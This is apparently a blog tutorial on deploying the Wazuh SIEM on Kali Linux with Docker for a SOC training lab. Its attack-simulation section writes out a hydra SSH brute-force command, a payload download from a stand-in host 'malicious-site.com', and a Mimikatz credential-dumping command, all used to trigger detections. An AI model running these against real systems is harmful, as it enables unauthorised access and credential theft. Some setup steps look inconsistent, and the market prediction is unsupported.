MASTER YOUR OWN SOC: DEPLOY WAZUH SIEM ON KALI LINUX WITH DOCKER IN 30 MINUTES + Video

Listen to this Post

Featured Image

Introduction:

Security Information and Event Management (SIEM) systems are the backbone of any Security Operations Center (SOC), aggregating and analyzing log data from across your infrastructure to detect threats in real time. Wazuh is a powerful, open-source SIEM platform that combines endpoint security, log analysis, and intrusion detection. By deploying Wazuh on Kali Linux using Docker, you can create a fully isolated, production-like lab environment for mastering SOC workflows, threat hunting, and incident response without impacting your host system.

Learning Objectives:

  • Deploy a complete Wazuh SIEM stack (Manager, Indexer, Dashboard) on Kali Linux using Docker containers.
  • Secure the Wazuh environment with TLS encryption and configure the web dashboard for log ingestion.
  • Simulate real-world attack scenarios and learn to query security events using Wazuh’s built-in rules and decoders.

You Should Know:

  1. Preparing Kali Linux for Docker and SIEM Deployment
    Step‑by‑step guide: Before deploying Wazuh, your Kali Linux system must have Docker and Docker Compose installed, along with sufficient resources. Update your package lists, install prerequisites, and verify that the Docker service is running.

Commands (Linux – Kali):

sudo apt update && sudo apt upgrade -y
sudo apt install -y docker.io docker-compose curl git
sudo systemctl enable docker --now
docker --version  Verify Docker installation
docker-compose --version  Verify Compose
sudo usermod -aG docker $USER  Add your user to docker group (log out/in to apply)
newgrp docker

Verify memory and disk space (recommend at least 4GB RAM and 20GB free for containers):

free -h
df -h

2. Cloning the Wazuh Docker Deployment Repository

Step‑by‑step guide: Wazuh provides an official GitHub repository with pre-configured Docker Compose files for a production-ready stack. Cloning this repository ensures you get the latest stable version with all necessary service definitions (wazuh-manager, wazuh-indexer, wazuh-dashboard).

Commands:

git clone https://github.com/wazuh/wazuh-docker.git
cd wazuh-docker/single-node  Use single-node deployment for a lab
ls -la  Inspect files: docker-compose.yml, .env, configs

Explain the components: `wazuh-manager` handles analysis and rule matching; `wazuh-indexer` (based on OpenSearch) stores indexed logs; `wazuh-dashboard` provides the web UI.

3. Generating TLS Certificates for Secure Communication

Step‑by‑step guide: Wazuh requires TLS certificates to encrypt traffic between the indexer, manager, and dashboard. The repository includes a script (generate-indexer-certs.yml) using Ansible or a simple cert-tool. We’ll use the built‑in `wazuh-certs-generator` for simplicity.

Commands (run from the `single-node` directory):

 Create a certificates directory and configuration
mkdir -p config/wazuh-indexer/certs
cd config/wazuh-indexer

Generate a root CA and node certificate using openssl (alternative method if script fails)
openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout root-ca-key.pem -out root-ca.pem -subj "/CN=Wazuh CA"
openssl genrsa -out wazuh-indexer-key.pem 2048
openssl req -new -key wazuh-indexer-key.pem -out wazuh-indexer.csr -subj "/CN=wazuh-indexer"
openssl x509 -req -in wazuh-indexer.csr -CA root-ca.pem -CAkey root-ca-key.pem -CAcreateserial -out wazuh-indexer.pem -days 365

Alternatively, use the official `wazuh-certs-tool` (requires `python3` and pip):

pip install cryptography
python3 /path/to/wazuh-docker/single-node/generate-indexer-certs.py --help

Copy the generated certificates to the appropriate locations as defined in docker-compose.yml. Ensure file permissions are restricted (chmod 600 .pem).

4. Deploying Wazuh Stack with Docker Compose

Step‑by‑step guide: After certificates are ready, launch all three containers. Docker Compose will pull the official Wazuh images, create a network, and start the services. Monitor the logs to ensure no errors.

Commands:

cd ~/wazuh-docker/single-node
docker-compose up -d  Detached mode
docker-compose ps  Check status (all three should be "Up")
docker-compose logs -f  Follow logs for real-time debugging

If ports conflict (default: 443 for dashboard, 9200 for indexer, 1514-1515 for manager), edit `docker-compose.yml` to map different host ports. For example, change dashboard port to 8443:443.

Expected output: three containers running. Access the dashboard at `https://:443` (or custom port). Default credentials: `admin` / `admin` (you will be prompted to change the password on first login).

5. Configuring Wazuh Dashboard and Adding Agents

Step‑by‑step guide: Once the dashboard is accessible, you need to register endpoints (agents) to send logs. Wazuh agents are available for Linux, Windows, macOS, and even Dockerized. For your SOC lab, install an agent on a separate virtual machine or even on the Kali host itself.

Commands to add an agent via the CLI (inside the manager container):

docker exec -it wazuh-manager /var/ossec/bin/manage_agents
 Inside the tool: choose 'A' to add an agent, provide name and IP, then extract the key.
 Alternatively, use the API:
docker exec -it wazuh-manager curl -u admin:admin -k -X POST "https://localhost:55000/agents" -H "Content-Type: application/json" -d '{"name":"windows-agent", "ip":"192.168.1.100"}'

For a Windows agent, download the installer from the Wazuh dashboard under “Agents” > “Deploy new agent”. Choose Windows, copy the pre‑generated command (includes the agent key), and run it on the target machine as Administrator.

Linux agent installation (on Ubuntu/Debian client):

curl -s https://packages.wazuh.com/4.x/keys/GPG-KEY-WAZUH | sudo apt-key add -
echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | sudo tee /etc/apt/sources.list.d/wazuh.list
sudo apt update && sudo apt install wazuh-agent
sudo systemctl start wazuh-agent
 Then edit /var/ossec/etc/ossec.conf to point to your Wazuh manager IP and agent key

6. Simulating Attack Scenarios and Ingesting Logs

Step‑by‑step guide: A SIEM is only useful when it receives meaningful data. Use common attack simulation tools on an agent machine to generate alerts, then verify that Wazuh detects them. Examples: Nmap scan, Metasploit reverse shell, or Mimikatz on Windows.

On a Linux agent, run:

sudo nmap -sS <target_IP>  SYN scan triggers port scan detection rules
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<target_IP>  Brute force

On a Windows agent (with PowerShell as Admin):

Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile C:\temp\payload.exe  Triggers file download rule
 Run Mimikatz (if allowed in lab) to simulate credential dumping
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Check alerts in the Wazuh dashboard under “Security Events” > “Alerts”. You should see rules such as “Multiple port scans detected” or “Windows Logon Credentials Dumping”. Use filters to search for specific agents or time ranges.

7. Hardening and Maintaining Your Wazuh SIEM Lab

Step‑by‑step guide: A SOC lab must be secure even for testing. Change default passwords, enable firewall rules, back up container volumes, and periodically update Wazuh components. For production‑like hardening, restrict dashboard access to specific IPs and use environment variables for secrets.

Commands to update Wazuh containers:

docker-compose down
docker-compose pull  Fetch latest images
docker-compose up -d  Recreate containers with new versions

Backup volumes (where indexes and configurations are stored):

docker run --rm -v wazuh-docker_single-node_wazuh-indexer-data:/data -v $(pwd):/backup alpine tar czf /backup/wazuh-indexer-backup.tar.gz -C /data .

Set up a cron job to regularly back up the configuration files (/var/lib/docker/volumes/).

What Undercode Say:

  • Key Takeaway 1: Docker drastically simplifies deploying complex SIEM stacks, allowing analysts to focus on detection engineering rather than infrastructure headaches.
  • Key Takeaway 2: Simulating real attacks (e.g., port scans, credential dumping) is the fastest way to learn how Wazuh parses logs and maps them to MITRE ATT&CK techniques.

Analysis: The Wazuh SIEM on Kali Linux with Docker represents a low‑cost, high‑fidelity training ground for aspiring SOC analysts. Unlike commercial SIEMs (Splunk, QRadar), Wazuh is fully open‑source and includes native FIM (File Integrity Monitoring), vulnerability detection, and CASB capabilities. However, challenges such as TLS certificate management, agent connectivity across subnets, and rule tuning require hands‑on practice. The step‑by‑step guide above mirrors real‑world deployment where container orchestration and security hardening are mandatory skills. By ingesting logs from diverse operating systems and simulating attacks, learners develop the ability to differentiate true positives from noise. This lab also integrates seamlessly with TheHive (for SOAR) or Elasticsearch, extending its utility. Ultimately, mastering Wazuh on Kali Linux builds a transferable skill set applicable to any SIEM platform.

Prediction:

Within the next 18 months, open‑source SIEMs like Wazuh will power over 40% of SME SOCs due to their low total cost of ownership and cloud‑native containerization. As regulatory pressures (GDPR, DORA, CMMC) increase log retention mandates, organisations will rely on Docker‑deployed SIEMs for rapid, scalable log management. Expect to see pre‑built “SOC‑in‑a‑box” appliances based on Wazuh, bundled with attack simulation scripts and automated compliance reporting. Analysts who can deploy, tune, and integrate such stacks will command premium salaries, while traditional SIEM vendors may shift toward hybrid licensing models. The biggest challenge will remain talent—hands‑on labs like the one documented here are the only effective answer.

▶️ Related Video (78% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Raymond Ebonine – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky